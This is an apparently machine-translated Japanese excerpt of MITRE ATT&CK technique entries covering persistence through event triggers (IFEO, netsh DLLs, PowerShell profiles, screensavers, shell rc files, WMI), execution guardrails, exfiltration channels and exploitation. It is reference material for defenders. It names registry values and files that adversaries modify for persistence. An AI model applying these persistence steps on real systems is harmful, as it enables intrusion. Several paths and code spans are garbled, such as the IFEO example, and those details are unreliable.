T1546.014 イベントトリガーによる実行。エモン 敵は、イベントモニターデーモン(emond)によって引き起こされる悪意のあるコンテンツを実行することで、永続性を獲得し、特権を昇格させる可能性があります。emondは、さまざまなサービスからイベントを受け取り、それをシンプルなルールエンジンで実行し、アクションを起こす[Launch Daemon](https://attack.mitre.org/techniques/T1543/004)です。<code>/sbin/emond</code>にあるemondのバイナリは、<code>/etc/emond.d/rules/</code>ディレクトリから任意のルールを読み込み、明示的に定義されたイベントが発生するとアクションを起こします。

ルールファイルはplist形式で、名前、イベントタイプ、実行するアクションを定義します。イベントタイプの例としては、システム起動やユーザー認証などがあります。アクションの例としては、システムコマンドの実行や電子メールの送信などがあります。emondサービスは、<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>にある[Launch Daemon](https://attack.mitre.org/techniques/T1543/004)設定ファイルで指定されたQueueDirectoriesパス<code>/private/var/db/emondClients</code>にファイルが存在しない場合は起動しません。plist</code>。(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)

敵対者は、システムの起動やユーザー認証など、定義されたイベントが発生したときにコマンドを実行するルールを記述することで、このサービスを悪用する可能性があります。(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) また、emondサービスは[Launch Daemon](https://attack.mitre.org/techniques/T1543/004)サービスによってroot権限で実行されるため、Adversariesは管理者からrootへと権限を昇格させることができる可能性があります。
192
T1546.012 イベントトリガーによる実行。画像ファイル実行オプションインジェクション 敵対者は、Image File Execution Options(IFEO)デバッガによって引き起こされる悪意のあるコンテンツを実行することで、持続性を確立したり、特権を昇格させたりする可能性があります。IFEOを使用すると、開発者はアプリケーションにデバッガーを添付することができます。プロセスが作成されると、アプリケーションのIFEOに存在するデバッガーがアプリケーション名の前に付加され、効果的にデバッガーの下で新しいプロセスが起動されます(例:<code>C:˶‾᷄д‾᷅˵ -g notepad.exe</code>)。(引用:Microsoft Dev Blog IFEO Mar 2010)

IFEOは、レジストリを介して直接設定するか、GFlagsツールを介してGlobal Flagsに設定することができます。(引用:マイクロソフトMicrosoft GFlags Mar 2017) IFEOは、レジストリの<code>Debugger</code>の値として、<code>HKLM\SOFTWARE{\Wow6432Node}executable></code> ここで、<code>&lt;executable&gt;</code>は、デバッガーが装着されているバイナリです。(引用元:Microsoft Dev Blog IFEO Mar 2010)

IFEOは、指定したプログラムがサイレントに終了した(自身またはカーネルモードではない第2のプロセスによって早期に終了した)場合に、任意のモニタープログラムを起動することも可能です。(引用:Microsoft Silent Process Exit NOV 2017) (引用:Oddvar Moe IFEO APR 2018) デバッガーと同様に、サイレントエグジットの監視は、GFlagsを介して、および/または<code>HKEY_LOCAL_MACHINESOFTWAREMicrosoft Windows NT\CurrentVersion\SilentProcessExit\</code>のIFEOおよびサイレントプロセスエグジットのレジストリ値を直接変更することで有効にすることができます。(引用:Microsoft Silent Process Exit NOV 2017) (引用:Oddvar Moe IFEO APR 2018)

[アクセシビリティ機能](https://attack.mitre.org/techniques/T1546/008)と同様に、Windows Vista以降およびWindows Server 2008以降では、「cmd.exe」またはバックドアアクセスを提供する他のプログラムを、アクセシビリティプログラム(ex: utilman.exe)の「デバッガ」として設定するレジストリキーが変更される場合があります。レジストリを変更した後、ログイン画面でキーボードを操作しているときや[Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)で接続しているときに、適切なキーの組み合わせを押すと、「デバッガー」プログラムがSYSTEM権限で実行されます。(引用:Tilbury 2014)

[Process Injection](https://attack.mitre.org/techniques/T1055)と同様に、これらの値を悪用して、コンピュータ上の別のプロセスのコンテキストで悪意のある実行ファイルをロードして実行させることで、特権昇格を得ることもできます。(引用:Elastic Process Injection July 2017) IFEOメカニズムをインストールすることで、継続的なトリガーによる呼び出しを介して永続性を提供することもできます。

マルウェアはIFEOを利用して、様々なシステムやセキュリティアプリケーションをリダイレクトしたり、効果的に無効化する無効なデバッガを登録することで、[Impair Defenses](https://attack.mitre.org/techniques/T1562)を行うこともあります。(引用:FSecure Hupigon) (引用:Symantec Ushedix June 2008)
193
T1546.006 イベントトリガーによる実行。LC_LOAD_DYLIBの追加 敵対者は、汚染されたバイナリの実行をきっかけに悪意のあるコンテンツを実行することで、パーシステンスを確立する可能性があります。Mach-Oバイナリには、バイナリがロードされる際に特定の操作を行うための一連のヘッダがあります。Mach-OバイナリのLC_LOAD_DYLIBヘッダーは、実行時にロードするダイナミックライブラリ(dylibs)をmacOSおよびOS Xに伝えます。これらは、残りのフィールドや依存関係に調整が加えられていれば、コンパイル済みのバイナリにアドホックに追加することができます。(引用:Writing Bad Malware for OSX) このような変更を行うためのツールもあります。

敵対者は、バイナリが実行されるたびに悪意のあるdylibをロードして実行するようにMach-Oのバイナリヘッダを変更することがあります。バイナリが変更されているため、どのような変更でもバイナリのデジタル署名は無効になりますが、これはバイナリからLC_CODE_SIGNATUREコマンドを削除するだけで、ロード時に署名がチェックされないようにすることで改善されます。(引用元:Malware Persistence on OS X)
194
T1546.007 イベントトリガーによる実行。Netsh Helper DLL 敵対者は、Netsh Helper DLLをトリガーとする悪意のあるコンテンツを実行することで、持続性を確立する可能性があります。Netsh.exe(Netshellとも呼ばれる)は、システムのネットワーク構成を操作するためのコマンドラインスクリプトユーティリティです。このユーティリティの機能を拡張するためのヘルパーDLLを追加する機能が含まれています。(引用: TechNet Netsh) 登録された netsh.exe ヘルパー DLL のパスは、Windows レジストリの <code>HKLM\SOFTWARE\Microsoft\Netsh</code> に入力されます。

敵対者は、netsh.exe ヘルパー DLL を使用して、任意のコードの実行を永続的に引き起こすことができます。この実行は、netsh.exeが実行されるたびに行われますが、これは自動的に行われる場合もあれば、別の永続化技術を使って行われる場合もあり、また、通常の機能の一部としてnetsh.exeを実行する他のソフトウェア (VPNなど) がシステム上に存在する場合もあります。(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
195
T1546.013 イベントトリガーによる実行。PowerShellプロファイル 侵入者は、PowerShellプロファイルをトリガーとした悪意のあるコンテンツを実行することで、持続性を獲得し、権限を昇格させることができます。PowerShellプロファイル(<code>profile.ps1</code>)は、[PowerShell](https://attack.mitre.org/techniques/T1059/001)の起動時に実行されるスクリプトで、ユーザー環境をカスタマイズするためのログオンスクリプトとして使用できます。

[PowerShell](https://attack.mitre.org/techniques/T1059/001)は、ユーザーやホストプログラムに応じて複数のプロファイルをサポートしています。例えば、[PowerShell](https://attack.mitre.org/techniques/T1059/001)のホストプログラム(PowerShellコンソール、PowerShell ISE、Visual Studio Codeなど)に応じて異なるプロファイルを設定することができます。管理者は、ローカルコンピュータ上のすべてのユーザーとホストプログラムに適用されるプロファイルを設定することもできます。(引用:Microsoft About Profiles)

敵対者はこれらのプロファイルを変更して、任意のコマンド、関数、モジュール、および/または[PowerShell](https://attack.mitre.org/techniques/T1059/001)ドライブを含み、持続性を得ることができます。ユーザーが[PowerShell](https://attack.mitre.org/techniques/T1059/001)セッションを開くたびに、起動時に<code>-NoProfile</code>フラグが使用されていない限り、修正されたスクリプトが実行されます。(引用:ESET Turla PowerShell 2019年5月号)

また、PowerShellプロファイル内のスクリプトが、ドメイン管理者などのより高い権限を持つアカウントによって読み込まれ実行された場合、敵対者は権限を昇格させることができる可能性があります。(引用:Wits End and Shady PowerShell Profiles)
196
T1546.002 イベントトリガーによる実行。スクリーンセーバー 侵入者は、ユーザーが活動していない時に悪意のあるコンテンツを実行することで、持続性を確立することがあります。スクリーンセーバーは、ユーザーが何もしない状態が一定時間続くと実行されるプログラムで、拡張子が.scrのPortable Executable(PE)ファイルで構成されています。(引用:Wikipedia Screensaver) Windowsのスクリーンセーバーアプリケーションscrnsave.scrは、64ビットのWindowsシステムでは<code>C:WindowsSystem32\</code>、<code>C:WindowssysWOW64\</code>に配置されており、Windowsの基本インストールに含まれるスクリーンセーバーと一緒に使用されます。

以下のスクリーンセーバーの設定はレジストリ(<code>HKCU\Control Panel\Desktop</code>)に保存されており、持続性を得るために操作される可能性があります。

* <code>SCRNSAVE.exe</code> - 悪意のある PE パスに設定される
* <code>ScreenSaveActive</code> - '1' に設定され、スクリーンセーバーを有効にする
* <code>ScreenSaverIsSecure</code> - '0' に設定され、ロック解除にパスワードを必要としない
* <code>ScreenSaveTimeout</code> - '1' に設定され、スクリーンセーバーを有効にする。code>ScreenSaveTimeout</code> - スクリーンセーバーが実行されるまでのユーザーの非活動時間を設定

敵対者は、スクリーンセーバーの設定を利用して、ユーザーの非活動時間が一定時間経過した後にマルウェアを実行するように設定することで、持続性を保つことができます。(引用:ESET Gazer 2017年8月)
197
T1546.005 イベントトリガーによる実行。トラップ 侵入者は、割り込み信号をきっかけに悪意のあるコンテンツを実行することで、持続性を確立することができます。<code>trap</code>コマンドは、プログラムやシェルが割り込み信号を受信したときに実行するコマンドを指定することができます。よくある状況は、<code>ctrl+c</code>や<code>ctrl+d</code>のような一般的なキーボード割り込みのグレースフルターミネーションや処理を可能にするスクリプトです。

敵対者はこれを利用して、シェルが特定の割り込みに遭遇したときに実行されるコードを登録することで、持続的なメカニズムとすることができます。Trapコマンドは以下のフォーマットです <code>trap 'command list' signals</code> ここで、「command list」は「signal」が受信されたときに実行されます(引用:Trap Manual)(引用:Cyberciti Trap Statements)。
198
T1546.004 イベントトリガーによる実行。Unix シェルの設定の変更 侵入者は、ユーザのシェルによって引き起こされる悪意のあるコマンドを実行することで、持続性を確立することができます。ユーザー[Unix Shell](https://attack.mitre.org/techniques/T1059/004)は、イベントに基づいて、セッション中のさまざまな時点で複数の設定スクリプトを実行します。例えば、ユーザーがコマンドライン・インターフェースを開いたり、(SSH経由などで)リモートでログインすると、ログインシェルが起動します。ログインシェルは、システム(<code>/etc</code>)やユーザーのホームディレクトリ(<code>~/</code>)にあるスクリプトを実行し、環境を設定します。システム上のすべてのログインシェルは、起動時に/etc/profileを使用します。これらの設定スクリプトは、そのディレクトリの権限レベルで実行され、環境変数の設定、エイリアスの作成、ユーザーの環境のカスタマイズなどによく使われます。

敵対者は、シェルが自動的に実行するスクリプトにコマンドを挿入することで、持続性の確立を試みることがあります。ほとんどのGNU/Linuxシステムのデフォルトシェルであるbashを例にとると、敵対者は、<code>/etc/profile</code>および<code>/etc/profile.d</code>ファイルに悪意のあるバイナリを起動するコマンドを追加することができます。(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) これらのファイルを変更するには、通常、root権限が必要で、システム上の任意のシェルが起動するたびに実行されます。ユーザーレベルのパーミッションの場合、敵対者は<code>~/.bash_profile</code>、<code>~/.bash_login</code>、または<code>~/.profile</code>に悪意のあるコマンドを挿入することができ、ユーザーがコマンドライン・インターフェースを開いたり、リモートで接続したりしたときにソースとなります。(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) システムは、リストアップされた順序で最初に存在するファイルのみを実行するため、敵対者は実行を確実にするために<code>~/.bash_profile</code>を使用しています。また、<code>~/.bashrc</code>というファイルも利用されています。このファイルは、リモートで接続が確立された場合や、コマンドラインインターフェイスの新しいタブなど、追加のインタラクティブシェルが開かれた場合に追加で実行されます。(引用:Tsunami)(引用:anomali-rocke-tactics)(引用:anomali-linux-rabbit)(引用:Magento) マルウェアの中には、プログラムの終了をターゲットにして実行を引き起こすものがあります。敵対者は、<code>~/.bash_logout</code>ファイルを使用して、セッションの終了時に悪意のあるコマンドを実行することができます。

macOSの場合、この手法の機能は似ていますが、macOS 10.15+のデフォルトシェルであるzshを利用する場合があります。Terminal.appを開くと、アプリケーションがzshのログインシェルとzshのインタラクティブシェルを起動します。ログインシェルでは、<code>/etc/profile</code>、<code>/etc/zshenv</code>、<code>/etc/zprofile</code>、<code>/etc/zlogin</code>を使ってシステム環境を設定します。(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh) そして、ログインシェルは、<code>~/.zprofile</code>と<code>~/.zlogin</code>でユーザ環境を設定します。対話シェルでは、<code>~/.zshrc</code>でユーザ環境を設定します。終了時には、<code>/etc/zlogout</code>と<code>~/.zlogout</code>が実行されます。レガシープログラムの場合、macOSは起動時に<code>/etc/bashrc</code>を実行します。
199
T1546.003 イベントトリガーによる実行。Windows Management Instrumentation イベントサブスクリプション Windows Management Instrumentation(WMI)のイベントサブスクリプションをトリガーとして悪意のあるコンテンツを実行することで、侵入者は永続性を確立し、特権を昇格させることができます。WMIは、定義されたイベントが発生したときにコードを実行するイベントフィルタ、プロバイダ、コンシューマ、およびバインディングをインストールするために使用できます。サブスクライブされるイベントの例としては、壁時計の時間、ユーザーのロギング、コンピュータの稼働時間などがあります。(引用:Mandiant M-Trends 2015)

敵対者はWMIの機能を利用してイベントをサブスクライブし、そのイベントが発生したときに任意のコードを実行し、システムに永続性を持たせることができます。(引用:FireEye WMI SANS 2015) (引用:FireEye WMI 2015) また、敵対者はWMIスクリプトをWindows Management Object (MOF)ファイル(拡張子.mof)にコンパイルし、悪意のあるサブスクリプションを作成するために使用することができます。(引用:Dell WMI Persistence) (引用:Microsoft MOF May 2018)

WMIサブスクリプションの実行は、WMI Provider Hostプロセス(WmiPrvSe.exe)によってプロキシされるため、SYSTEM権限が昇格することがあります。
200
T1480 実行時のガードレール 敵対者は実行ガードレールを使用して、敵対者が提供した情報やターゲットに存在すると予想される環境固有の条件に基づいて、実行や行動を制限することができます。ガードレールは、ペイロードが意図されたターゲットに対してのみ実行されることを保証し、敵対者のキャンペーンによる巻き添え被害を軽減する(引用:FireEye Kevin Mandia Guardrails) ガードレールとして使用するために敵対者がターゲットのシステムや環境について提供できる値には、特定のネットワーク共有名、接続された物理デバイス、ファイル、結合されたActive Directory(AD)ドメイン、ローカル/外部IPアドレスなどがある(引用:FireEye Outlook Dec 2019)

ガードレールは、侵害や操作が意図されていない環境における能力の露出を防ぐために使用できる。このガードレールの使用は、典型的な[Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)とは異なります。Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)の使用では、既知のサンドボックスの値をチェックし、一致しない場合にのみ実行を継続しますが、ガードレールの使用では、予想されるターゲット固有の値をチェックし、そのような一致があった場合にのみ実行を継続します。
201
T1480.001 実行ガードレール。環境キーイング 敵対者は、防御を回避し、実行を特定のターゲット環境に限定するために、マルウェアのペイロードやその他の機能を環境キー化することがあります。環境キーイングでは、ターゲットに存在すると予想される、敵から提供された環境固有の条件に基づいて、実行やアクションを制限するために暗号を使用します。環境キーイングは、特定のコンピューティング環境において、特定のタイプの値から暗号化/復号化キーを導出するための暗号技術を利用した[Execution Guardrails](https://attack.mitre.org/techniques/T1480)の実装です。(引用:EK Clueless Agents)

ターゲット固有の要素から値を導出し、暗号化されたペイロードの復号化キーを生成するために使用することができます。ターゲット固有の値は、特定のネットワーク共有、物理デバイス、ソフトウェア/ソフトウェアのバージョン、ファイル、参加しているADドメイン、システム時刻、ローカル/外部IPアドレスなどから導き出すことができます。(引用:Kaspersky Gauss Whitepaper)(引用:Proofpoint Router Malvertising)(引用:EK Impeding Malware Analysis)(引用:Environmental Keyed HTA)(引用:Ebowla: Genetic Malware) 環境キーイングは、ターゲット固有の環境値から復号鍵を生成することで、サンドボックス検出、アンチウイルス検出、情報のクラウドソーシング、リバースエンジニアリングを困難にします。(

[難読化されたファイルや情報](https://attack.mitre.org/techniques/T1027)と同様に、敵対者は環境キーイングを利用して、自分たちのTTPを守り、検知を逃れることができます。環境キーイングは、暗号化されたペイロードをターゲットに配信し、実行前にターゲット固有の値を使用してペイロードを復号化するために使用することができます。(引用:Kaspersky Gauss Whitepaper)(引用:EK Impeding Malware Analysis)(引用:Environmental Keyed HTA)(引用:Ebowla: Genetic Malware)(引用:Demiguise Guardrail Router Logo) ペイロードの復号化にターゲット固有の値を利用することで、敵対者は復号化キーをペイロードと一緒にパッケージ化したり、潜在的に監視されているネットワーク接続を介して送信したりすることを避けることができます。ターゲット固有の値を収集する技術によっては、暗号化されたペイロードのリバースエンジニアリングが非常に困難になる場合があります。(引用:Kaspersky Gauss Whitepaper) これは、侵害されることやその中で操作されることが意図されていない環境における能力の露出を防ぐために使用することができます。

他の[実行ガードレール](https://attack.mitre.org/techniques/T1480)と同様に、環境キーイングは、侵害されることやその中で操作されることが意図されていない環境における能力の露出を防ぐために使用することができます。この活動は、典型的な [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)とは異なります。Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)では、既知のサンドボックスの値をチェックし、一致しない場合にのみ実行を継続しますが、Environmental Keyingの使用では、予想されるターゲット固有の値をチェックし、復号化とその後の実行を成功させるために一致させる必要があります。
202
T1048 オルタナティブ・プロトコルを利用した Exfiltration 敵対者は、既存のコマンド&コントロール・チャネルとは異なるプロトコルを使ってデータを流出させることでデータを盗むことがあります。

代替プロトコルには、FTP、SMTP、HTTP/S、DNS、SMB、またはメインのコマンド&コントロールチャネルとして使用されていないその他のネットワークプロトコルが含まれます。別のプロトコルチャネルには、クラウドストレージなどのWebサービスも含まれます。敵対者は、これらの代替チャネルを暗号化および/または難読化することも選択できます。

[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)は、[Net](https://attack.mitre.org/software/S0039)/SMBやFTPなどの様々な一般的なオペレーティングシステムのユーティリティを使用して行うことができます。(引用:Palo Alto OilRig Oct 2016)
203
T1048.002 Exfiltration Over Alternative Protocol:非対称暗号化された非C2プロトコルによる侵入 敵対者は、既存のコマンド&コントロール・チャネルとは異なる非対称暗号化されたネットワーク・プロトコルを使ってデータを盗み出すことがあります。

非対称暗号化アルゴリズムとは、チャネルの両端で異なる鍵を使用するものです。公開鍵暗号とも呼ばれ、対応する鍵からデータを暗号化/復号化できる暗号鍵のペアが必要です。通信チャネルの各末端には、秘密鍵(そのエンティティの行列内のみ)と他のエンティティの公開鍵が必要です。各エンティティの公開鍵は、暗号化通信を開始する前に交換される。

非対称暗号化を使用するネットワークプロトコル(HTTPS/TLS/SSL など)は、鍵を交換すると対称暗号化を使用することが多い。敵対者は、プロトコルに組み込まれているこれらの暗号化メカニズムを利用することを選ぶかもしれません。
204
T1048.001 Exfiltration Over Alternative Protocol:対称的に暗号化された非C2プロトコルによる侵入 敵対者は、既存のコマンド&コントロール・チャネルとは別の対称的に暗号化されたネットワーク・プロトコルを介してデータを流出させることにより、データを盗むことができます。

対称型暗号化アルゴリズムとは、チャネルの両端で共有または同じ鍵/秘密を使用するものです。

非対称暗号を使用するネットワーク・プロトコルは、鍵が交換されると対称暗号を使用することが多いのですが、敵対者は手動で鍵を共有し、プロトコルに組み込まれたメカニズムを使用して対称暗号アルゴリズム(例:RC4、AES)を実装することを選ぶかもしれません。その結果、(HTTPS のようにネイティブに暗号化されているプロトコルでは)何重にも暗号化されたり、(HTTP や FTP のように)通常は暗号化されていないプロトコルでも暗号化されたりします。
205
T1048.003 Exfiltration Over Alternative Protocol:暗号化/難読化されていない非C2プロトコルによる侵入 敵対者は、既存のコマンド&コントロール・チャネルとは別の暗号化されていないネットワーク・プロトコルを使ってデータを盗み出すことができます。

敵対者は、本来暗号化されていないネットワークプロトコル(HTTP、FTP、DNSなど)の中で、暗号化せずにデータを難読化することを選ぶかもしれません。これには、カスタムまたは一般に公開されているエンコード/圧縮アルゴリズム(base64など)のほか、プロトコルのヘッダやフィールドにデータを埋め込む方法があります。
206
T1041 C2チャネルでの脱出 敵対者は、既存のコマンド&コントロール・チャネルを使ってデータを盗み出すことがあります。盗まれたデータは、コマンド&コントロール通信と同じプロトコルを使用して、通常の通信チャネルにエンコードされます。 207
T1011 他のネットワーク媒体への侵入 敵対者は、コマンド&コントロール・チャネルとは異なるネットワーク媒体を介してデータを流出させようとする場合があります。コマンド&コントロールネットワークが有線のインターネット接続である場合、例えば、WiFi接続、モデム、携帯電話データ接続、Bluetooth、またはその他の無線周波(RF)チャネルを介して、データの流出が行われる可能性があります。

敵対者は、十分なアクセス権または近接性がある場合、この方法を選択する可能性があります。また、この接続は、同じ企業ネットワークを介してルーティングされていないため、プライマリのインターネット接続チャネルと同様に、セキュリティや防御が施されていない可能性があります。
208
T1011.001 Exfiltration Over Other Network Medium:Bluetoothを利用した盗み出し 攻撃者は、コマンド&コントロール・チャネルではなく、Bluetoothを使用してデータを流出させようとする場合があります。コマンド&コントロールネットワークが有線のインターネット接続である場合、攻撃者はBluetoothの通信チャネルを使ってデータを流出させることを選択するかもしれません。

敵対者は、十分なアクセスと近接性があれば、この方法を選択するかもしれません。Bluetooth接続は、同じ企業ネットワークを経由していないため、インターネットに接続された主要なチャネルほどのセキュリティや防御が施されていない可能性があります。
209
T1052 物理的媒体への侵入 敵対者は、リムーバブルドライブなどの物理媒体を介してデータの流出を試みることがあります。エアギャップによるネットワーク侵害などの特定の状況では、ユーザが導入した物理的な媒体やデバイスを介して、データの流出が発生する可能性があります。このような媒体は、外付けハードドライブ、USBドライブ、携帯電話、MP3プレーヤ、またはその他のリムーバブルストレージおよび処理デバイスである可能性があります。この物理媒体やデバイスは、最終的な流出ポイントとして使用されたり、切断されたシステム間を移動するために使用されたりします。 210
T1052.001 物理的媒体を介した侵入。USB経由での盗み出し 敵対者は、USB 接続された物理デバイスを介してデータの流出を試みることがあります。エアギャップによるネットワーク侵害などの特定の状況下では、ユーザが導入したUSBデバイスを介してデータの流出が発生する可能性があります。USB デバイスは、最終的な流出ポイントとして使用されたり、切断されたシステム間のホップとして使用されたりします。 211
T1567 ウェブサービスを利用した侵入 敵対者は、主要なコマンド&コントロールチャネルではなく、既存の合法的な外部 Web サービスを使用してデータを流出させることがあります。一般的なウェブサービスがデータ流出のメカニズムとして機能することは、ネットワーク内のホストが侵害前にすでにそのサービスと通信している可能性があるため、かなりのカバーが可能です。また、これらのサービスへのトラフィックを許可するファイアウォールルールがすでに存在している可能性もあります。

ウェブサービスプロバイダは、SSL/TLS 暗号化を使用するのが一般的であり、敵対者に追加の保護レベルを与えています。
212
T1567.002 Webサービスを介したExfiltration。クラウドストレージへの侵入 敵対者は、主要なコマンド&コントロール・チャネルではなく、クラウド・ストレージ・サービスにデータを流出させることがあります。クラウドストレージサービスとは、インターネットを介して遠隔地のクラウドストレージサーバからデータの保存、編集、取得を可能にするサービスです。

クラウドストレージサービスの例としては、DropboxやGoogle Docsなどがあります。このようなクラウドストレージサービスへの侵入は、ネットワーク内のホストが既にサービスと通信している場合、敵対者に大きな援護射撃となります。
213
T1567.001 Webサービスを介したExfiltration。コードリポジトリへの侵入 敵対者は、主要なコマンド&コントロールチャネルではなく、コードリポジトリにデータを流出させることがあります。コードリポジトリは、多くの場合、API を通じてアクセスできます(例: https://api.github.com)。

コードリポジトリへの流出は、それがネットワーク内のホストによって既に使用されている人気のあるサービスである場合、敵対者に大きなカバーを提供することにもなります。
214
T1190 公共性の高いアプリケーションへの侵入 敵対者は、インターネットに接続されたコンピュータやプログラムの弱点を、ソフトウェア、データ、コマンドなどを使って利用し、意図しない、あるいは予期しない動作を引き起こそうとすることがあります。システムの弱点とは、バグ、グリッチ、または設計上の脆弱性のことです。これらのアプリケーションはウェブサイトであることが多いですが、データベース(SQLなど)(引用:NVD CVE-2016-6662)、標準サービス(SMB(引用:CIS Multiple SMB Vulnerabilities)やSSHなど)、ネットワーク機器の管理・運用プロトコル(SNMPやSmart Installなど)(引用:US-CERT TA18-106A Network Infrastructure Devices 2018)(引用:Cisco Blog Legacy Device Attacks))、Webサーバーや関連サービスなどインターネットにアクセス可能なオープンソケットを持つその他のアプリケーションを含むことがあります。(引用:NVDE-2014-7169) 悪用される欠陥によっては、[Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211)が含まれる場合があります。

アプリケーションがクラウドベースのインフラストラクチャにホストされていたり、コンテナ化されていたりする場合、それを悪用すると、基盤となるインスタンスやコンテナが侵害される可能性があります。これにより、クラウドやコンテナのAPIへのアクセス、[Escape to Host](https://attack.mitre.org/techniques/T1611)によるコンテナのホストアクセスの悪用、脆弱なアイデンティティやアクセス管理ポリシーの利用などが可能になります。

ウェブサイトやデータベースについては、OWASPトップ10やCWEトップ25が最も一般的なウェブベースの脆弱性を強調しています。(引用:OWASPトップ10)(引用:CWEトップ25)
215
T1203 クライアント実行のためのエクスプロイト 敵対者は、クライアントアプリケーションのソフトウェアの脆弱性を利用してコードを実行する可能性があります。脆弱性は、予期しない動作を引き起こす可能性のある、安全でないコーディング方法によってソフトウェアに存在する可能性があります。敵対者は、任意のコード実行を目的とした標的型攻撃により、特定の脆弱性を利用することができます。多くの場合、攻撃者のツールキットにとって最も価値のあるエクスプロイトは、リモートシステム上でコード実行を得るために使用できるものであり、それはそのシステムへのアクセスに使用できるからです。ユーザーは、自分が普段仕事で使用しているアプリケーションに関連するファイルが表示されることを期待しているため、その実用性の高さからエクスプロイトの研究開発の対象となります。

いくつかのタイプが存在します。

### Browser-based Exploitation

Webブラウザは、[Drive-by Compromise](https://attack.mitre.org/techniques/T1189)や[Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)などでよく狙われます。エンドポイントシステムは、通常のWebブラウジングや、特定のユーザーがスピアフィッシン グメールに記載された、Webブラウザを悪用するために敵が管理するサイトへのリンクに よって狙われることで、危険にさらされる可能性があります。

### オフィスアプリケーション

Microsoft Office などの一般的なオフィスアプリケーションや生産性向上のためのアプリケーションも [Phishing](https://attack.mitre.org/techniques/T1566)の対象となります。悪意のあるファイルは、添付ファイルとして直接送信されたり、ダウンロード用のリンクを介して送信されます。

### 一般的なサードパーティのアプリケーション

一般的によく見かけるアプリケーションや、標的となるネットワークに導入されているソフトウェアの一部も悪用される可能性があります。企業環境で一般的なAdobe ReaderやFlashなどのアプリケーションは、システムへのアクセスを試みる敵対者に日常的に狙われています。ソフトウェアや脆弱性の性質によっては、ブラウザ上で悪用されるものや、ユーザがファイルを開く必要があるものもあります。例えば、いくつかのFlashの脆弱性は、Microsoft Office文書内のオブジェクトとして配信されています。
216
T1212 クレデンシャルアクセスへの悪用 敵対者は、ソフトウェアの脆弱性を悪用してクレデンシャルを収集しようとすることがあります。ソフトウェアの脆弱性の悪用は、プログラム、サービス、またはオペレーティングシステム・ソフトウェアやカーネル自体のプログラミング・エラーを利用して、敵対者が制御するコードを実行する場合に発生します。 クレデンシャルや認証の仕組みは、有用なクレデンシャルにアクセスしたり、システムにアクセスするためのプロセスを回避したりする手段として、敵対者に悪用される可能性があります。この例として、KerberosをターゲットにしたMS14-068があります。このMS14-068は、ドメイン・ユーザの権限を使用してKerberosチケットを偽造するために使用することができます。(引用: Technet MS14-068)(引用: ADSecurity Detecting Forged Tickets) クレデンシャル・アクセスの悪用は、ターゲットにされたプロセスや取得されたクレデンシャルに応じて、Privilege Escalation(特権の昇格)を引き起こすこともあります。 217
T1211 防御回避のための搾取 敵対者は、システムやアプリケーションの脆弱性を利用して、セキュリティ機能を回避することがあります。ソフトウェアの脆弱性の利用は、敵対者がプログラム、サービス、またはオペレーティングシステム・ソフトウェアやカーネル自体のプログラミング・エラーを利用して、敵対者が制御するコードを実行する場合に発生します。

敵対者は、環境内にセキュリティ・ソフトウェアが存在することを偵察によって事前に知っている場合や、システムが侵害されている間または直後に[セキュリティ・ソフトウェアの発見](https://attack.mitre.org/techniques/T1518/001)のためのチェックを行う場合があります。セキュリティ・ソフトウェアは、おそらく直接悪用の対象となるでしょう。ウイルス対策ソフトウェアが検知されないように持続的な脅威グループに狙われている例があります。
218
T1068 Privilege Escalationのためのエクスプロイト 敵対者は、ソフトウェアの脆弱性を悪用して、特権の昇格を試みることがあります。ソフトウェアの脆弱性の悪用とは、プログラムやサービス、またはオペレーティングシステムのソフトウェアやカーネル自体のプログラミングエラーを利用して、敵対者が制御するコードを実行することです。権限レベルなどのセキュリティ構造は、情報へのアクセスや特定の技術の使用を妨げることが多いため、敵対者はこれらの制限を回避するために、ソフトウェアの悪用を含む特権拡大を実行する必要があるでしょう。

システムに最初にアクセスしたとき、敵対者はシステム上の特定のリソースにアクセスできないように、低い権限のプロセスで操作することがあります。通常、オペレーティング・システム・コンポーネントや、より高い権限で実行されるソフトウェアには、システム上でより高いレベルのアクセスを得るために利用できる脆弱性が存在する場合があります。これにより、脆弱性のあるコンポーネントに応じて、非特権またはユーザーレベルのパーミッションから、SYSTEMまたはrootパーミッションに移行できる可能性があります。また、仮想マシンやコンテナ内などの仮想化環境から、基礎となるホストに移動することも可能になります。

敵対者は、署名済みの脆弱なドライバを侵害されたマシンに持ち込み、その脆弱性を利用してカーネルモードでコードを実行することがあります。このプロセスは、Bring Your Own Vulnerable Driver (BYOVD)と呼ばれることもあります。(引用: ESET InvisiMole June 2020)(引用: Unit42 AcidBox June 2020) 敵対者は、初期アクセス時に配信されるファイルに脆弱性ドライバを含めたり、[Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)や[Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)を介して、侵害されたシステムにダウンロードしたりすることがあります。
219
T1210 リモートサービスの悪用 敵対者は、ネットワーク内に入ると、リモートサービスを悪用して内部システムへの不正アクセスを行うことがあります。ソフトウェアの脆弱性の悪用とは、敵対者が、プログラム、サービス、またはオペレーティングシステムのソフトウェアやカーネル自体のプログラミングエラーを利用して、敵対者が制御するコードを実行することです。

敵対者は、リモートシステムが脆弱な状態にあるかどうかを判断する必要があるかもしれません。これは、[ネットワークサービススキャン](https://attack.mitre.org/techniques/T1046)や、ネットワークに展開されている可能性のある一般的な脆弱なソフトウェア、脆弱性を示す特定のパッチの欠如、リモート搾取を検出または抑制するために使用される可能性のあるセキュリティソフトウェアを探すその他の発見方法によって行うことができます。

